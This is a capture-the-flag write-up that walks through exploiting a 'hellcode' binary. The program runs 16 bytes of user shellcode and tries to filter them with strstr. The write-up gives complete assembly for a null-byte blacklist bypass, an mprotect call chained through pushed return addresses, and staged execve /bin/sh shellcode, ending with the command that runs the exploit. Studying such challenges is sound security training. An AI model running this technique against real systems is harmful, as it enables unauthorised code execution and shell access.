Problem Overview
In this challenge, we are asked to exploit a program (source) that executes any 16 bytes of machine code we give it. We see that it reads the 16 bytes using fgets, which reads until 16 bytes are found or a new line is hit. It then continues by checking our code for sequences of instructions to prevent us from doing specific things.

One important point here is that it uses strstr to check if our code contains the blacklisted sequences. Being a c string function, it takes strings that are terminated by a null byte. This is important, because as we established before, fgets reads until a new line and will accept null bytes.

As we can see there, our program succesfully bypassed the strstr(tmp_code,"\xff") check. Now that we know we can input any code so long as a null byte comes before the offending bytes, we still need to craft shellcode. First I checked online for shellcode that was 16 bytes, however the only stuff I could find required /bin/sh to be found in the executable. It's also worth noting we can't literally use shellcode, because shellcode has no null bytes, while we need null bytes in our shellcode.
So how can we run shellcode if there's nothing shorter than 16 bytes?
My initial hope was that the text segment would be writable, meaning we could modify the code that calls fgets(tmp_code, 17, stdin) to fgets(tmp_code, 1000, stdin). The next thing I noticed was that the 16 bytes of code is mmaped to a segment of size 4096. After seeing this, I hoped that I could write something to the buffer, call code_runner, write more to the buffer, and continue doing that. Code that would do that would look like:
mov word [buffer], 0xshellcode
call code_runner
Sadly the buffer was also nonwriteable, again preventing this strategy from working. After thinking for a bit, I decided to try to call mprotect(buffer, 4096, 7), which would let us write to the buffer. To do this, we would need to embed assembly that looks like this:
mov rdi, buffer ;rdi is the address parameter
mov rdx, 7 ;prot parameter. 7 indicates rwx
mov rsi, 4096 ; length parameter
call 0x400860 ; address of mprotect
call 0x400996 ;call back to code_runner so that we can enter our next 16 bytes and move on Luckily, rdi happens to contain the address of the buffer already, so we can eliminate that instruction. rsi also happens to already contain 4096, so we can reduce our assembly to:
mov rdx, 7
call 0x400860
call 0x400996
Let's try assembling it with python shellme.py -i "mov rdx, 7\ncall 0x400860\ncall 0x400996" -a elf64.

Wonderful, it fits within 16 bytes! Let's run it and see what happens.

Well those calls aren't quite what we expected. That's because the locations to call to are relative. We need absolute calls. To do that, we would mov rax, 0xaddress and call rax. So let's try that

Well that's too long. Now if we think about what ret does, it returns to the last instruction on the stack. That means pushing 0x400860 and letting a ret instruction execute should be identical to calling 0x400860, ignoring the consequences of how the stack will end up looking, which we don't care about given that we only want a shellcode, not a running program. So let's try this technique:
mov rdx, 7
push 0x400996
push 0x400860
After assembling it and running it, we get exactly what we want. mprotect is called on the buffer, and we call code_runner again for a second round. We now have a section of writeable and executable memory to work with. Now we just have to write shellcode to that memory and call it. I'll be using the shellcode found here: http://shell-storm.org/shellcode/files/shellcode-603.php. So what we're going to do is save the address of the buffer to r15, a seldom used register, and slowly write the shellcode to that memory. The code to do that follows. It's in groups of 16 bytes when assembled.
mov r15, [rsp+0x68]; Saving the address of the memory we just made writeable and executable to r15 for easier access in the future
mov word [r15], 0x3148
push 0x400996

mov word [r15+2], 0x48d2
nop
nop
nop
nop
push 0x400996

mov dword [r15+4], 0x622f2fbb
nop
nop
nop
push 0x400996

mov dword [r15+8], 0x732f6e69
nop
nop
nop
push 0x400996

mov dword [r15+12], 0xebc14868
nop
nop
nop
push 0x400996

mov dword [r15+16], 0x89485308
nop
nop
nop
push 0x400996

mov dword [r15+20], 0x485750e7
nop
nop
nop
push 0x400996

mov dword [r15+24], 0x3bb0e689
nop
nop
nop
push 0x400996

mov bl,0
mov dword [r15+28], 0x0000050f
nop
push 0x400996

mov bl,0
call r15
xor eax,eax
xor eax,eax
xor eax,eax

At the end of the assembly, you may have seen the mov bl,0. This is so we write a null byte before the rest of the shellcode, to bypass the strstr checking as mentioned before. After we assemble and run this in a debugger, we see process ***** is executing new program: /bin/dash. That means our exploit was successful. To run it, we use (python -c "print 'shellcode'"; cat) | /problems/hellcode/hellcode.